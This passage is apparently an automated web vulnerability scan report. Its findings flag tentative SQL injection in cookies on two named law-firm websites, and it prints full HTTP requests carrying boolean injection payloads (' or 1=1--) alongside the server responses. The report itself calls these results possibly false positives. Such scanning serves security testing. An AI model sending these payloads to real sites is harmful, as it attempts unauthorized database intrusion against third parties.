<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>



<script type="text/javascript">

</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 8pt;
}
body {
   background-color: #FFF;
   margin-left: 0px;
   margin-top: 10px;
   margin-right: 0px;
   margin-bottom: 10px;
}
--
...[SNIP]...

1.60. http://www.curtis.com/sitecontent.cfm [__utma cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.curtis.com
Path:	/sitecontent.cfm

Issue detail

The __utma cookie appears to be vulnerable to SQL injection attacks. The payloads 74416649'%20or%201%3d1--%20 and 74416649'%20or%201%3d2--%20 were each submitted in the __utma cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /sitecontent.cfm?pageid=6 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.174416649'%20or%201%3d1--%20; __utmc=126702367; __utmb=126702367.1.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Mon, 18 Apr 2011 17:00:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: __UTMA=;expires=Sun, 18-Apr-2010 17:00:58 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /sitecontent.cfm?pageid=6 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.174416649'%20or%201%3d2--%20; __utmc=126702367; __utmb=126702367.1.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:00:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/scripts/masks.js"></script>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">

<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link href="/sifr3/sifr3.css" rel="stylesheet" type="text/css" />

<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>



<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearc
...[SNIP]...

1.61. http://www.curtis.com/sitecontent.cfm [__utmb cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.curtis.com
Path:	/sitecontent.cfm

Issue detail

The __utmb cookie appears to be vulnerable to SQL injection attacks. The payloads 13432204'%20or%201%3d1--%20 and 13432204'%20or%201%3d2--%20 were each submitted in the __utmb cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /sitecontent.cfm?pageid=6 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.1.10.130314580313432204'%20or%201%3d1--%20; CFID=6175843; CFTOKEN=32575697

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Mon, 18 Apr 2011 17:01:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: __UTMB=;expires=Sun, 18-Apr-2010 17:01:18 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /sitecontent.cfm?pageid=6 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.1.10.130314580313432204'%20or%201%3d2--%20; CFID=6175843; CFTOKEN=32575697

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:01:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/scripts/masks.js"></script>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">

<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link href="/sifr3/sifr3.css" rel="stylesheet" type="text/css" />

<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>



<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearc
...[SNIP]...

1.62. http://www.curtis.com/sitecontent.cfm [__utmc cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.curtis.com
Path:	/sitecontent.cfm

Issue detail

The __utmc cookie appears to be vulnerable to SQL injection attacks. The payloads 70094951%20or%201%3d1--%20 and 70094951%20or%201%3d2--%20 were each submitted in the __utmc cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /sitecontent.cfm?pageid=6 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=12670236770094951%20or%201%3d1--%20; __utmb=126702367.1.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Mon, 18 Apr 2011 17:01:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: __UTMC=;expires=Sun, 18-Apr-2010 17:01:08 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /sitecontent.cfm?pageid=6 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=12670236770094951%20or%201%3d2--%20; __utmb=126702367.1.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:01:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/scripts/masks.js"></script>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">

<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link href="/sifr3/sifr3.css" rel="stylesheet" type="text/css" />

<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>



<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearc
...[SNIP]...

1.63. http://www.curtis.com/sitecontent.cfm [__utmz cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.curtis.com
Path:	/sitecontent.cfm

Issue detail

The __utmz cookie appears to be vulnerable to SQL injection attacks. The payloads 15928176'%20or%201%3d1--%20 and 15928176'%20or%201%3d2--%20 were each submitted in the __utmz cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /sitecontent.cfm?pageid=6 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)15928176'%20or%201%3d1--%20; __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.1.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Mon, 18 Apr 2011 17:00:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: __UTMZ=;expires=Sun, 18-Apr-2010 17:00:48 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /sitecontent.cfm?pageid=6 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)15928176'%20or%201%3d2--%20; __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.1.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:00:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/scripts/masks.js"></script>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">

<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link href="/sifr3/sifr3.css" rel="stylesheet" type="text/css" />

<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>



<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearc
...[SNIP]...

1.64. http://www.curtis.com/sitecontent.cfm [sifrFetch cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.curtis.com
Path:	/sitecontent.cfm

Issue detail

The sifrFetch cookie appears to be vulnerable to SQL injection attacks. The payloads 10251358'%20or%201%3d1--%20 and 10251358'%20or%201%3d2--%20 were each submitted in the sifrFetch cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /sitecontent.cfm?pageid=6 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true10251358'%20or%201%3d1--%20; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.1.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Mon, 18 Apr 2011 17:00:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: SIFRFETCH=;expires=Sun, 18-Apr-2010 17:00:39 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /sitecontent.cfm?pageid=6 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true10251358'%20or%201%3d2--%20; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.1.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:00:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/scripts/masks.js"></script>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">

<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link href="/sifr3/sifr3.css" rel="stylesheet" type="text/css" />

<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>



<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearc
...[SNIP]...

1.65. http://www.friedfrank.com/ [__utma cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.friedfrank.com
Path:	/

Issue detail

The __utma cookie appears to be vulnerable to SQL injection attacks. The payloads 77794298'%20or%201%3d1--%20 and 77794298'%20or%201%3d2--%20 were each submitted in the __utma cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET / HTTP/1.1
Host: www.friedfrank.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=113041875.1303088795.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=113041875.727875777.1303088795.1303088795.1303088795.177794298'%20or%201%3d1--%20

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 21 Apr 2011 10:37:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: __UTMA=;expires=Wed, 21-Apr-2010 10:37:47 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 10:37:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: JSMOBILE=1;path=/
Set-Cookie: JSMOBILE=0;path=/
Set-Cookie: CFID=31400776;path=/
Set-Cookie: CFTOKEN=41635339;path=/
Content-Type: text/html; charset=UTF-8








































<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<META NAME="keywords" CONTENT="">
<META NAME="description" CONTENT="">

<meta name="verify-v1" content="L9ZLHht3G4Zc0L6/Gg2wdpu3oMGZLi1MmvGFU4K2HiU=" />

<title>Fried Frank > Home</title>
<link rel="shortcut icon" type="image/ico" href="/
favicon.ico">
<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/sIFR-screen.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/sIFR-print.css" type="text/css" media="print" />
<link href="scripts/dropdowns.css" rel="stylesheet" type="text/css" media="all" />
<script language="javascript" src="scripts/sifr.js" type="text/javascript"></script>

<style type="text/css">

</style>
<script src="scripts/AC_RunActiveContent.js" type="text/javascript"></script>
<script src="scripts/dropdowns.js" type="text/javascript"></script>
</head>

...[SNIP]...

1.66. http://www.friedfrank.com/ [__utmz cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.friedfrank.com
Path:	/

Issue detail

The __utmz cookie appears to be vulnerable to SQL injection attacks. The payloads 66107724'%20or%201%3d1--%20 and 66107724'%20or%201%3d2--%20 were each submitted in the __utmz cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET / HTTP/1.1
Host: www.friedfrank.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=113041875.1303088795.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)66107724'%20or%201%3d1--%20; __utma=113041875.727875777.1303088795.1303088795.1303088795.1

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 21 Apr 2011 10:37:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: __UTMZ=;expires=Wed, 21-Apr-2010 10:37:22 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET / HTTP/1.1
Host: www.friedfrank.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=113041875.1303088795.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)66107724'%20or%201%3d2--%20; __utma=113041875.727875777.1303088795.1303088795.1303088795.1

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 10:37:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: JSMOBILE=1;path=/
Set-Cookie: JSMOBILE=0;path=/
Set-Cookie: CFID=31400753;path=/
Set-Cookie: CFTOKEN=96108296;path=/
Content-Type: text/html; charset=UTF-8








































<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<META NAME="keywords" CONTENT="">
<META NAME="description" CONTENT="">

<meta name="verify-v1" content="L9ZLHht3G4Zc0L6/Gg2wdpu3oMGZLi1MmvGFU4K2HiU=" />

<title>Fried Frank > Home</title>
<link rel="shortcut icon" type="image/ico" href="/
favicon.ico">
<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/sIFR-screen.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/sIFR-print.css" type="text/css" media="print" />
<link href="scripts/dropdowns.css" rel="stylesheet" type="text/css" media="all" />
<script language="javascript" src="scripts/sifr.js" type="text/javascript"></script>

<style type="text/css">

</style>
<script src="scripts/AC_RunActiveContent.js" type="text/javascript"></script>
<script src="scripts/dropdowns.js" type="text/javascript"></script>
</head>

...[SNIP]...

